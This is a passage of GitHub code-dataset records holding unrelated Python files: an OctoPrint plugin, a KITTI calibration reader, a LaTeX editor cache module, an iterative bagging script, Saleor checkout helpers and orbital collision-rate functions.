script[\"onConnect\"] == ON_CONNECT.DISABLED:\n self._logger.info(\n \"Disabling Script on Connect: '%(name)s'\",\n {\"name\": script[\"name\"]}\n )\n script[\"enabled\"] = False\n self.write_settings()\n\n ##~~ Softwareupdate hook\n\n def get_update_information(self):\n return {\n \"gcodescriptmanager\": {\n \"displayName\": \"GCODE Script Manager\",\n \"displayVersion\": self._plugin_version,\n # version check: github repository\n \"type\": \"github_release\",\n \"user\": \"kforth\",\n \"repo\": \"OctoPrint-GcodeScriptManager\",\n \"current\": self._plugin_version,\n # update method: pip\n \"pip\": \"https://github.com/kforth/OctoPrint-GcodeScriptManager/archive/{target_version}.zip\",\n }\n }\n\n\n__plugin_name__ = \"GCODE Script Manager\"\n\n__plugin_pythoncompat__ = \">=3,<4\" # Only Python 3\n\n\ndef __plugin_load__():\n global __plugin_implementation__\n __plugin_implementation__ = GcodeScriptManagerPlugin()\n\n global __plugin_hooks__\n __plugin_hooks__ = {\n \"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information,\n \"octoprint.comm.protocol.scripts\": __plugin_implementation__.gcode_script_hook,\n \"octoprint.printer.handle_connect\": __plugin_implementation__.handle_connect_hook,\n }\n","repo_name":"kForth/OctoPrint-GcodeScriptManager","sub_path":"octoprint_gcodescriptmanager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38617597355","text":"\nimport os\nimport re\n\nimport cv2\nimport numpy as np\n\n\ndef read_calib(calib_path):\n with open(calib_path) as f:\n for line in f.readlines():\n if line[:2] == \"P2\":\n P2 = re.split(\" \", line.strip())\n P2 = np.array(P2[-12:], np.float32)\n P2 = P2.reshape((3, 4))\n if line[:14] == \"Tr_velo_to_cam\" or line[:11] == \"Tr_velo_cam\":\n vtc_mat = re.split(\" \", line.strip())\n vtc_mat = np.array(vtc_mat[-12:], np.float32)\n vtc_mat = vtc_mat.reshape((3, 4))\n vtc_mat = np.concatenate([vtc_mat, [[0, 0, 0, 1]]])\n if line[:7] == \"R0_rect\" or line[:6] == \"R_rect\":\n R0 = re.split(\" \", line.strip())\n R0 = np.array(R0[-9:], np.float32)\n R0 = R0.reshape((3, 3))\n R0 = np.concatenate([R0, [[0], [0], [0]]], -1)\n R0 = np.concatenate([R0, [[0, 0, 0, 1]]])\n vtc_mat = np.matmul(R0, vtc_mat)\n\n return P2, vtc_mat\n\n\n\ndef convertformat_det_to_track(det,frame):\n # print()\n #lidar coor, dx,dy,dz,x,y,z,yaw,id\n calib_path = os.path.join('/mnt/nas3/Data/kitti-processed/object_tracking/training/calib',str(frame).zfill(4)+\"txt\")\n intrinsic, extrinsic = read_calib(calib_path)\n ","repo_name":"ies0411/Swift3DMot","sub_path":"tools/tracking_modules/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73027149493","text":"import os\nimport re\nimport shutil\nimport hashlib\nimport time\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nimport sublime\n\nif sublime.version() < '3000':\n _ST3 = False\n from latextools_utils import get_setting\nelse:\n _ST3 = True\n from . import get_setting\n long = int\n\n# the folder, if the local cache is not hidden, i.e. 
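# A minimal sketch of the Jinja2 rendering step used in gcode_script_hook
# above; the script text and context values here are made-up examples.
from jinja2 import BaseLoader, Environment

script = "G1 Z{{ last_position.z + 5 }} F300"
context = {"last_position": {"z": 10.0}}
rendered = Environment(loader=BaseLoader()).from_string(script).render(**context)
print(rendered)   # -> "G1 Z15.0 F300"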
folder in the same\n# folder as the tex root\nLOCAL_CACHE_FOLDER = \".st_lt_cache\"\n# folder to store all hidden local caches in the cache path\nHIDDEN_LOCAL_CACHE_FOLDER = \"local_cache\"\n# global cache folder for ST2, this folder will be created inside the User\n# folder to store the global and the local cache\nST2_GLOBAL_CACHE_FOLDER = \".lt_cache\"\n\n\nTIME_RE = re.compile(\n r\"\\s*(?:(?P\\d+)\\s*d(?:ays?)?)?\"\n r\"\\s*(?:(?P\\d+)\\s*h(?:ours?)?)?\"\n r\"\\s*(?:(?P\\d+)\\s*m(?:in(?:utes?)?)?)?\"\n r\"\\s*(?:(?P\\d+)\\s*s(?:ec(?:onds?)?)?)?\\s*\"\n)\n\n\nclass CacheMiss(Exception):\n \"\"\"exception to indicate that the cache file is missing\"\"\"\n pass\n\n\ndef hash_digest(text):\n \"\"\"\n Create the hash digest for a text. These digest can be used to\n create a unique filename from the path to the root file.\n The used has function is md5.\n\n Arguments:\n text -- the text for which the digest should be created\n \"\"\"\n text_encoded = text.encode(\"utf8\")\n hash_result = hashlib.md5(text_encoded)\n return hash_result.hexdigest()\n\n\ndef delete_local_cache(tex_root):\n \"\"\"\n Removes the local cache folder and the local cache files\n \"\"\"\n print(u\"Deleting local cache for '{0}'.\".format(repr(tex_root)))\n local_cache_paths = [_hidden_local_cache_path(),\n _local_cache_path(tex_root)]\n for cache_path in local_cache_paths:\n if os.path.exists(cache_path):\n print(u\"Delete local cache folder '{0}'\".format(repr(cache_path)))\n shutil.rmtree(cache_path)\n\n\ndef invalidate_local_cache(cache_path):\n \"\"\"\n Invalidates the local cache by removing the cache folders\n \"\"\"\n if os.path.exists(cache_path):\n print(u\"Invalidate local cache '{0}'.\".format(repr(cache_path)))\n shutil.rmtree(cache_path)\n\n\ndef cache(tex_root, name, generate):\n \"\"\"\n Alias for cache_local:\n Uses the local cache to retrieve the entry for the name.\n If the entry is not available, it will be calculated via the\n generate-function and cached using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root.\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n generate -- a function pointer/closure to create the cached object\n for case it is not available in the cache,\n must be compatible with pickle\n \"\"\"\n return cache_local(tex_root, name, generate)\n\n\ndef write(tex_root, name, obj):\n \"\"\"\n Alias for write_local:\n Writes the object to the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n obj -- the object to write, must be compatible with pickle\n \"\"\"\n write_local(tex_root, name, obj)\n\n\ndef read(tex_root, name):\n \"\"\"\n Alias for read_local:\n Reads the object from the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to read the object\n\n Returns:\n The object at the location with the name\n \"\"\"\n return read_local(tex_root, name)\n\n\ndef cache_local(tex_root, name, generate):\n \"\"\"\n Uses the local cache to retrieve the entry for the name.\n If the entry is not available, it will be calculated via the\n generate-function and cached using pickle.\n The local 
cache is per tex document and the path will extracted\n from the tex root.\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n generate -- a function pointer/closure to create the cached object\n for case it is not available in the cache,\n must be compatible with pickle\n \"\"\"\n try:\n result = read_local(tex_root, name)\n except CacheMiss:\n result = generate()\n write_local(tex_root, name, result)\n return result\n\n\ndef write_local(tex_root, name, obj):\n \"\"\"\n Writes the object to the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to write the object\n obj -- the object to write, must be compatible with pickle\n \"\"\"\n cache_path = _local_cache_path(tex_root)\n _write(cache_path, name, obj)\n _create_cache_timestamp(cache_path)\n\n\ndef read_local(tex_root, name):\n \"\"\"\n Reads the object from the local cache using pickle.\n The local cache is per tex document and the path will extracted\n from the tex root\n\n Arguments:\n tex_root -- the root of the tex file (for the folder of the cache)\n name -- the relative file name to read the object\n\n Returns:\n The object at the location with the name\n \"\"\"\n cache_path = _local_cache_path(tex_root)\n _validate_life_span(cache_path)\n return _read(cache_path, name)\n\n\ndef cache_global(name, generate):\n \"\"\"\n Uses the global sublime cache retrieve the entry for the name.\n If the entry is not available, it will be calculated via the\n generate-function and cached using pickle.\n\n Arguments:\n name -- the relative file name to write the object\n generate -- a function pointer/closure to create the cached object\n for case it is not available in the cache,\n must be compatible with pickle\n \"\"\"\n try:\n result = read_global(name)\n except CacheMiss:\n result = generate()\n write_global(name, result)\n return result\n\n\ndef write_global(name, obj):\n \"\"\"\n Writes the object to the global sublime cache path using pickle\n\n Arguments:\n name -- the relative file name to write the object\n obj -- the object to write, must be compatible with pickle\n \"\"\"\n cache_path = _global_cache_path()\n _write(cache_path, name, obj)\n\n\ndef read_global(name):\n \"\"\"\n Reads the object from the global sublime cache path using pickle\n\n Arguments:\n name -- the relative file name to read the object\n\n Returns:\n The object at the location with the name\n \"\"\"\n cache_path = _global_cache_path()\n return _read(cache_path, name)\n\n\ndef _local_cache_path(tex_root):\n hide_cache = get_setting(\"hide_local_cache\", True)\n\n if not hide_cache:\n root_folder = os.path.dirname(tex_root)\n return os.path.join(root_folder, LOCAL_CACHE_FOLDER)\n else:\n cache_path = _hidden_local_cache_path()\n # convert the root to plain string and hash it\n root_hash = hash_digest(tex_root)\n return os.path.join(cache_path, root_hash)\n\n\ndef _hidden_local_cache_path():\n global_path = _global_cache_path()\n return os.path.join(global_path, HIDDEN_LOCAL_CACHE_FOLDER)\n\n\ndef _global_cache_path():\n # For ST3, put the cache files in cache dir\n # and for ST2, put it in the user packages dir\n if _ST3:\n cache_path = os.path.join(sublime.cache_path(), \"LaTeXTools\")\n else:\n cache_path = os.path.join(sublime.packages_path(),\n \"User\",\n ST2_GLOBAL_CACHE_FOLDER)\n return 
os.path.normpath(cache_path)\n\n\ndef _write(cache_path, name, obj):\n if _ST3:\n try:\n os.makedirs(cache_path, exist_ok=True)\n except FileExistsError:\n pass\n else:\n if not os.path.isdir(cache_path):\n os.makedirs(cache_path)\n\n file_path = os.path.join(cache_path, name)\n with open(file_path, \"wb\") as f:\n pickle.dump(obj, f, protocol=-1)\n\n\ndef _read(cache_path, name):\n file_path = os.path.join(cache_path, name)\n if not os.path.exists(file_path):\n raise CacheMiss()\n\n with open(file_path, \"rb\") as f:\n return pickle.load(f)\n\n\n_CACHE_TIMESTAMP_FILE = \"created_time_stamp\"\n\n\ndef _create_cache_timestamp(cache_path):\n \"\"\"\n Creates a life span with the current time (cache folder exist).\n Does only create a timestamp if it does not already exists.\n \"\"\"\n access_path = os.path.join(cache_path, _CACHE_TIMESTAMP_FILE)\n if not os.path.exists(access_path):\n print(u\"Writing cache creation timestamp\")\n created = long(time.time())\n try:\n with open(access_path, \"w\") as f:\n f.write(str(created))\n except Exception as e:\n print(u\"Error occured writing cache creation timestamp\")\n print(e)\n\n\ndef _validate_life_span(cache_path):\n life_span = _read_life_span()\n # if life span is none: only manual deletion\n if life_span is None:\n return\n\n created = _read_cache_timestamp(cache_path)\n\n current_time = long(time.time())\n if created + life_span < current_time:\n print(u\"Life span of local cache is over. Invalidate local cache.\")\n invalidate_local_cache(cache_path)\n raise CacheMiss(u\"Cache life span expired\")\n\n\ndef _read_cache_timestamp(cache_path):\n access_path = os.path.join(cache_path, _CACHE_TIMESTAMP_FILE)\n try:\n with open(access_path, \"r\") as f:\n created = long(f.read())\n except:\n print(u\"No creation timestamp for local cache\")\n invalidate_local_cache(cache_path)\n raise CacheMiss(u\"Life span timestamp missing\")\n return created\n\n\ndef _read_life_span():\n try:\n life_span_string = get_setting(\"local_cache_life_span\")\n if not life_span_string:\n raise Exception(u\"No lifespan defined\")\n if life_span_string == \"infinite\":\n return None\n life_span = _parse_life_span_string(life_span_string)\n except:\n life_span = 30 * 60 # default: 30 mins\n return life_span\n\n\ndef _parse_life_span_string(life_span_string):\n \"\"\"Parses a life span string, raises an exception if it cannot parse\"\"\"\n try:\n life_span = int(life_span_string)\n except:\n life_span = _convert_life_span_string(life_span_string)\n if life_span <= 0:\n raise Exception(\"Life span must be greater than 0\")\n return life_span\n\n\ndef _convert_life_span_string(life_span_string):\n \"\"\"Converts a TIME_RE compatible life span string,\n raises an exception if it is not compatible\"\"\"\n (d, h, m, s) = TIME_RE.match(life_span_string).groups()\n # time conversions in seconds\n times = [(s, 1), (m, 60), (h, 3600), (d, 86400)]\n # sum the converted times\n # if not specified (None) use 0\n return sum(int(t[0] or 0) * t[1] for t in times)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/SublimeText_LaTeXTools/LaTeXTools-master/latextools_utils/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":11100,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"28005765246","text":"'''\nIterative_bagging\n'''\nimport argparse\nimport os.path as osp\nimport copy\n\nimport numpy as np\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.naive_bayes import GaussianNB\nfrom 
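# A short usage sketch for the cache() helper above: the generate closure runs
# only on a cache miss and its pickled result is reused afterwards. The names
# here are illustrative, not part of the module.
def get_labels(tex_root):
    def generate():
        # an expensive scan of the tex tree would go here
        return ["sec:intro", "fig:setup"]
    return cache(tex_root, "labels", generate)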
sklearn.svm import LinearSVC\nfrom pandas import DataFrame\nfrom collections import defaultdict\nfrom sklearn.metrics import mean_squared_error\nimport random\n\nfrom ..data import create\nfrom ..utils.utils import draw_line_chart, save_results\n\ndef get_RMSE(predicted, gt):\n return np.sqrt(mean_squared_error(predicted,gt))\n \n\ndef iterative_bagging(args):\n epoch_num = args.epoch_num\n predictor_num = args.predictor_num\n x_train, x_test, y_train, y_test = create('concrete',args.data_dir) # initial x,y for train and test\n x_train = np.array(x_train)\n x_test = np.array(x_test)\n y_train = np.array(y_train)\n y_test = np.array(y_test)\n train_num = np.shape(x_train)[0]\n test_num = np.shape(x_test)[0]\n train_residual = copy.deepcopy(y_train) # y_n^j, the residual to fit in j-th iteration\n test_predict = np.array([0]*test_num) # the predict result after j-th iteration\n log = []\n for t in range(epoch_num):\n # print(train_residual[0])\n train_predict_dict = defaultdict(list)\n for i in range(predictor_num):\n tmpIds = []\n id_get = {}\n valid_id = []\n for j in range(train_num):\n tmpId = random.randint(0,train_num-1)\n tmpIds.append(tmpId)\n id_get[tmpId] = True\n for j in range(train_num):\n if j not in id_get:\n valid_id.append(j) # samples that not included in tmp trainset\n tmp_x_train = x_train[tmpIds]\n tmp_train_residual = train_residual[tmpIds]\n clf = DecisionTreeRegressor(max_depth=2)\n clf.fit(tmp_x_train, tmp_train_residual)\n train_predict = clf.predict(x_train)\n for j in valid_id:\n train_predict_dict[j].append(train_predict[j])\n test_predict = test_predict + clf.predict(x_test)*(1.0/predictor_num) # update the predict for sample j in testSet\n for i in train_predict_dict:\n train_residual[i] -= np.mean(train_predict_dict[i]) # update the residual of sample i in trainSet\n tRMSE = get_RMSE(test_predict,y_test)\n print('{}\\t{}'.format(t+1,tRMSE))\n sum_square_residual = np.mean(train_residual*train_residual) \n if args.VIS:\n log.append([t + 1, tRMSE])\n if t==0:\n min_sum_square_residual = sum_square_residual\n else:\n if sum_square_residual > 1.1*min_sum_square_residual:\n break\n if sum_square_residual < min_sum_square_residual:\n min_sum_square_residual = sum_square_residual\n if args.VIS:\n draw_line_chart(DataFrame(log, columns=['the number of epochs', 'RMSE']), 'the number of epochs', 'RMSE',\n 'iterative_bagging_concrete')\n save_results(test_predict, osp.join(args.results_dir, 'iterative_bagging_concrete.txt'))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--epoch_num', type=int, default=50)\n parser.add_argument('--predictor_num', type=int, default=30)\n parser.add_argument('--data_dir', type=str, default='/Users/gaojingyue/Desktop/bagging_boosting/data/concrete')\n parser.add_argument('--results_dir', type=str, default='/Users/gaojingyue/Desktop/bagging_boosting/results')\n parser.add_argument('--VIS', action='store_true',default=False)\n iterative_bagging(parser.parse_args())","repo_name":"PkuDavidGuan/bagging_boosting","sub_path":"models/iterative_bagging.py","file_name":"iterative_bagging.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41014311950","text":"from dataclasses import dataclass\nfrom typing import TYPE_CHECKING, Iterable, List, Optional\n\nfrom django.utils.functional import SimpleLazyObject\n\nfrom ..discount import DiscountInfo, VoucherType\nfrom ..discount.utils import 
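# The bootstrap-with-out-of-bag bookkeeping from the training loop above,
# condensed into a numpy sketch: draw n indices with replacement, then the
# out-of-bag set is every index that was never drawn.
import numpy as np

def bootstrap_oob(n, rng=np.random):
    in_bag = rng.choice(n, size=n, replace=True)
    oob = np.setdiff1d(np.arange(n), in_bag)
    return in_bag, oob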
fetch_active_discounts\nfrom ..graphql.shipping.utils import (\n annotate_active_shipping_methods,\n annotate_shipping_methods_with_price,\n convert_shipping_method_model_to_dataclass,\n)\nfrom ..shipping.models import ShippingMethodChannelListing\n\nif TYPE_CHECKING:\n from ..account.models import Address, User\n from ..channel.models import Channel\n from ..discount.models import Voucher\n from ..plugins.manager import PluginsManager\n from ..product.models import (\n Collection,\n Product,\n ProductType,\n ProductVariant,\n ProductVariantChannelListing,\n )\n from ..shipping.models import ShippingMethod\n from .models import Checkout, CheckoutLine\n\n\n@dataclass\nclass CheckoutLineInfo:\n line: \"CheckoutLine\"\n variant: \"ProductVariant\"\n channel_listing: \"ProductVariantChannelListing\"\n product: \"Product\"\n product_type: \"ProductType\"\n collections: List[\"Collection\"]\n voucher: Optional[\"Voucher\"] = None\n\n\n@dataclass\nclass CheckoutInfo:\n checkout: \"Checkout\"\n user: Optional[\"User\"]\n channel: \"Channel\"\n billing_address: Optional[\"Address\"]\n shipping_address: Optional[\"Address\"]\n shipping_method: Optional[\"ShippingMethod\"]\n valid_shipping_methods: List[\"ShippingMethod\"]\n shipping_method_channel_listings: Optional[ShippingMethodChannelListing]\n\n def get_country(self) -> str:\n address = self.shipping_address or self.billing_address\n if address is None or not address.country:\n return self.checkout.country.code\n return address.country.code\n\n def get_customer_email(self) -> str:\n return self.user.email if self.user else self.checkout.email\n\n\ndef fetch_checkout_lines(checkout: \"Checkout\") -> Iterable[CheckoutLineInfo]:\n \"\"\"Fetch checkout lines as CheckoutLineInfo objects.\"\"\"\n\n from .utils import get_discounted_lines, get_voucher_for_checkout\n\n lines = checkout.lines.prefetch_related(\n \"variant__product__collections\",\n \"variant__channel_listings__channel\",\n \"variant__product__product_type\",\n )\n lines_info = []\n\n for line in lines:\n variant = line.variant\n product = variant.product\n product_type = product.product_type\n collections = list(product.collections.all())\n\n variant_channel_listing = None\n for channel_listing in line.variant.channel_listings.all():\n if channel_listing.channel_id == checkout.channel_id:\n variant_channel_listing = channel_listing\n\n # FIXME: Temporary solution to pass type checks. 
Figure out how to handle case\n # when variant channel listing is not defined for a checkout line.\n if not variant_channel_listing:\n continue\n\n lines_info.append(\n CheckoutLineInfo(\n line=line,\n variant=variant,\n channel_listing=variant_channel_listing,\n product=product,\n product_type=product_type,\n collections=collections,\n )\n )\n if checkout.voucher_code and lines_info:\n channel_slug = checkout.channel.slug\n voucher = get_voucher_for_checkout(\n checkout, channel_slug=channel_slug, with_prefetch=True\n )\n if not voucher:\n # in case when voucher is expired, it will be null so no need to apply any\n # discount from voucher\n return lines_info\n if voucher.type == VoucherType.SPECIFIC_PRODUCT or voucher.apply_once_per_order:\n discounted_lines_by_voucher: List[CheckoutLineInfo] = []\n if voucher.apply_once_per_order:\n discounts = fetch_active_discounts()\n channel = checkout.channel\n cheapest_line_price = None\n cheapest_line = None\n for line_info in lines_info:\n line_price = line_info.variant.get_price(\n product=line_info.product,\n collections=line_info.collections,\n channel=channel,\n channel_listing=line_info.channel_listing,\n discounts=discounts,\n )\n if not cheapest_line or cheapest_line_price > line_price:\n cheapest_line_price = line_price\n cheapest_line = line_info\n if cheapest_line:\n discounted_lines_by_voucher.append(cheapest_line)\n else:\n discounted_lines_by_voucher.extend(\n get_discounted_lines(lines_info, voucher)\n )\n for line_info in lines_info:\n if line_info in discounted_lines_by_voucher:\n line_info.voucher = voucher\n return lines_info\n\n\ndef fetch_checkout_info(\n checkout: \"Checkout\",\n lines: Iterable[CheckoutLineInfo],\n discounts: Iterable[\"DiscountInfo\"],\n manager: \"PluginsManager\",\n) -> CheckoutInfo:\n \"\"\"Fetch checkout as CheckoutInfo object.\"\"\"\n\n channel = checkout.channel\n shipping_address = checkout.shipping_address\n shipping_method = checkout.shipping_method\n shipping_method_channel_listing = None\n all_shipping_method_channel_listings = list(\n ShippingMethodChannelListing.objects.filter(\n channel=channel,\n )\n )\n if shipping_method:\n for listing in all_shipping_method_channel_listings:\n if listing.shipping_method_id == shipping_method.id:\n shipping_method_channel_listing = listing\n break\n\n checkout_info = CheckoutInfo(\n checkout=checkout,\n user=checkout.user,\n channel=channel,\n billing_address=checkout.billing_address,\n shipping_address=shipping_address,\n shipping_method=shipping_method,\n shipping_method_channel_listings=shipping_method_channel_listing,\n valid_shipping_methods=[],\n )\n checkout_info.valid_shipping_methods = SimpleLazyObject(\n lambda: get_valid_shipping_method_list_for_checkout_info(\n checkout_info,\n shipping_address,\n lines,\n discounts,\n manager,\n all_shipping_method_channel_listings,\n )\n ) # type: ignore\n return checkout_info\n\n\ndef update_checkout_info_shipping_address(\n checkout_info: CheckoutInfo,\n address: Optional[\"Address\"],\n lines: Iterable[CheckoutLineInfo],\n discounts: Iterable[\"DiscountInfo\"],\n manager: \"PluginsManager\",\n):\n checkout_info.shipping_address = address\n valid_methods = get_valid_shipping_method_list_for_checkout_info(\n checkout_info, address, lines, discounts, manager\n )\n checkout_info.valid_shipping_methods = valid_methods\n\n\ndef get_valid_shipping_method_list_for_checkout_info(\n checkout_info: \"CheckoutInfo\",\n shipping_address: Optional[\"Address\"],\n lines: Iterable[CheckoutLineInfo],\n discounts: 
Iterable[\"DiscountInfo\"],\n manager: \"PluginsManager\",\n channel_listings: Optional[List[\"ShippingMethodChannelListing\"]] = None,\n):\n from .utils import get_valid_shipping_methods_for_checkout\n\n if channel_listings is None:\n channel_listings = list(\n ShippingMethodChannelListing.objects.filter(channel=checkout_info.channel)\n )\n\n country_code = shipping_address.country.code if shipping_address else None\n subtotal = manager.calculate_checkout_subtotal(\n checkout_info, lines, checkout_info.shipping_address, discounts\n )\n subtotal -= checkout_info.checkout.discount\n checkout = checkout_info.checkout\n\n valid_shipping_methods = (\n get_valid_shipping_methods_for_checkout(\n checkout_info, lines, subtotal, country_code=country_code\n )\n or []\n )\n annotate_shipping_methods_with_price(\n valid_shipping_methods,\n channel_listings,\n checkout_info.shipping_address,\n checkout_info.channel.slug,\n manager,\n )\n shipping_method_dataclasses = [\n convert_shipping_method_model_to_dataclass(shipping)\n for shipping in valid_shipping_methods\n ]\n excluded_shipping_methods = manager.excluded_shipping_methods_for_checkout(\n checkout, shipping_method_dataclasses\n )\n annotate_active_shipping_methods(\n valid_shipping_methods,\n excluded_shipping_methods,\n )\n\n return [method for method in valid_shipping_methods if method.active]\n\n\ndef update_checkout_info_shipping_method(\n checkout_info: CheckoutInfo, shipping_method: Optional[\"ShippingMethod\"]\n):\n checkout_info.shipping_method = shipping_method\n checkout_info.shipping_method_channel_listings = (\n (\n ShippingMethodChannelListing.objects.filter(\n shipping_method=shipping_method, channel=checkout_info.channel\n ).first()\n )\n if shipping_method\n else None\n )\n","repo_name":"TGalioAutomation/web-saleor","sub_path":"saleor/checkout/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35485848243","text":"from Functions import *\n'''\nau = 149597871e3\nG = 6.67408e-11\nMstar = 1.2e30\n'''\n\n#(a1,e1)=orbitalvalues(3)\n#(a2,e2)=orbitalvalues(10)\n#a1=0.999*a1\n\n#Values\n'''\na1 = 2.5 * au\ne1 = 0.998\na2 = 2.4 * au\ne2 = 0.997\n'''\n\n#I=1* ((2 * pi) / 360)\n#Rbeam=100e3\n\ndef TPrecess(a,e):\n Tp=0.15*((1-(e**2.))/(1-(0.999**2.)))*((a/au)**2.5)*(10**6.) #in Yrs\n wp = (2 * np.pi) / Tp\n return (Tp,wp)\n\n\n\n\ndef RcolwoATcontact(a1,e1,a2,e2,s1,s2,x,I1,I2,Rbeam):\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n CollisionData=CollisionPoints(a1,e1,s1,a2,e2,s2)\n if x == 'a':\n R = CollisionData[1, 0]\n C = CollisionData[0, 0]\n elif x == 'b':\n R = CollisionData[1, 1]\n C = CollisionData[0, 1]\n\n if R==0:\n RColwoA=0\n Tcontact=0\n #print('no contact')\n\n else:\n td1=thetadot(a1,e1,C-s1)\n rd1=rdot(a1,e1,C-s1)\n V1=np.array([rd1,R*td1*cos(I1),R*td1*sin(I1)])\n v1=np.sqrt((rd1**2.)+((R*td1)**2.))\n td2 = thetadot(a2, e2, C - s2)\n rd2 = rdot(a2, e2, C - s2)\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n v2 = np.sqrt((rd2 ** 2.) + ((R * td2) ** 2.))\n Vrelpar=V1-V2\n vrelpar=npal.norm(Vrelpar)\n gammangle=np.arccos(np.vdot(V1,V2)/(v1*v2))\n\n\n T1 = 2 * pi * np.sqrt((a1 ** 3.) / (G * Mstar)) # Orbital Period\n T2 = 2 * pi * np.sqrt((a2 ** 3.) 
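# A tiny sketch of the SimpleLazyObject deferral used in fetch_checkout_info
# above: the wrapped callable only runs when the proxy is first touched, so
# valid shipping methods are not computed unless something reads them.
from django.utils.functional import SimpleLazyObject

def expensive_methods():
    print("computed")          # side effect to make the laziness visible
    return ["dhl", "ups"]

methods = SimpleLazyObject(expensive_methods)
# nothing has run yet; the first real use triggers the computation:
print(len(methods))            # prints "computed", then 2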
/ (G * Mstar))\n\n sinval=abs(sin(gammangle))\n '''\n if (16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)>sinval:\n sinval=(16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)\n print('sinval',sinval)\n print('lambda=',(s1-s2)%(2*pi))\n '''\n\n\n\n RColwoA=(16 / (3 * pi)) * (1 / (T1 * T2)) * ((vrelpar )/ (sinval*v1 * v2 ))*(year/Rbeam) #\n\n Tcontact=abs((4*Rbeam*np.linalg.norm(np.cross(V1, V2)))/(((R** 2.) * td1 * td2 * abs(sin(I2-I1)))*(((wp1) * (rd1 / td1)) - (wp2) * (rd2 / td2))))\n\n\n return [RColwoA,Tcontact]\n\n\n\ndef RcolwoATcontactSecondOrder(a1,e1,a2,e2,s1,s2,x,I1,I2,Rbeam):\n (Tp1, wp1) = TPrecess(a1, e1)\n (Tp2, wp2) = TPrecess(a2, e2)\n CollisionData=CollisionPoints(a1,e1,s1,a2,e2,s2)\n if x == 'a':\n R = CollisionData[1, 0]\n C = CollisionData[0, 0]\n elif x == 'b':\n R = CollisionData[1, 1]\n C = CollisionData[0, 1]\n else:\n print('Error, no point selected')\n R=0\n if R==0:\n #print('no contact error')\n RColwoA=0\n Tcontact=0\n else:\n td1=thetadot(a1,e1,C-s1)\n rd1=rdot(a1,e1,C-s1)\n V1=np.array([rd1,R*td1*cos(I1),R*td1*sin(I1)])\n v1=np.sqrt((rd1**2.)+((R*td1)**2.))\n td2 = thetadot(a2, e2, C - s2)\n rd2 = rdot(a2, e2, C - s2)\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * sin(I2)])\n v2 = np.sqrt((rd2 ** 2.) + ((R * td2) ** 2.))\n Vrelpar=V1-V2\n vrelpar=npal.norm(Vrelpar)\n gammangle=np.arccos(np.vdot(V1,V2)/(v1*v2))\n\n\n T1 = 2 * pi * np.sqrt((a1 ** 3.) / (G * Mstar)) # Orbital Period\n T2 = 2 * pi * np.sqrt((a2 ** 3.) / (G * Mstar))\n\n sinval=abs(sin(gammangle))\n '''\n if (16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)>sinval:\n sinval=(16*abs((rd1/td1)-(rd2/td2)))/(3*pi*R)\n print('sinval',sinval)\n print('lambda=',(s1-s2)%(2*pi))\n '''\n\n\n\n RColwoA=(16 / (3 * pi)) * (1 / (T1 * T2)) * ((vrelpar )/ (sinval*v1 * v2 ))*(year/Rbeam) #\n\n\n\n dr=((2*Rbeam)*np.linalg.norm(np.cross(V1, V2)))/((R** 2.) * td1 * td2 * abs(sin(I2-I1)))\n Alpha=(wp1 * (rd1 / td1)) - (wp2 * (rd2 / td2))\n Beta=abs(((((wp1 * (rd1 / td1))**2.) - ((wp2 * (rd2 / td2))**2.))/R)+((R/2)*((wp1**2.)-(wp2**2.)))-(((R**2.)/2)*((((wp1**2.)/(a1*(1-(e1**2.))))-((wp2**2.)/(a2*(1-(e2**2.))))))))\n Tcontact = (np.sqrt((Alpha ** 2.) + (4 * Beta * dr)) - np.sqrt((Alpha ** 2.) - (4 * Beta * dr))) / (2*Beta)\n\n\n return [RColwoA,Tcontact]\n\n\ndef TcontactSearchMethod(a1,e1,a2,e2,s1i,s2i,x,I1,I2,Rbeam):\n\n CollisionData=CollisionPoints(a1,e1,s1i,a2,e2,s2i)\n if x == 'a':\n R = CollisionData[1, 0]\n C = CollisionData[0, 0]\n elif x == 'b':\n R = CollisionData[1, 1]\n C = CollisionData[0, 1]\n else:\n print('Error, no point selected')\n R=0\n if R==0:\n #print('no contact error')\n RColwoA=0\n Tcontact=0\n dr=0\n\n else:\n td1=thetadot(a1,e1,C-s1i)\n rd1=rdot(a1,e1,C-s1i)\n V1=np.array([rd1,R*td1*cos(I1),R*td1*sin(I1)])\n td2 = thetadot(a2, e2, C - s2i)\n rd2 = rdot(a2, e2, C - s2i)\n V2 = np.array([rd2, R * td2 * cos(I2), R * td2 * 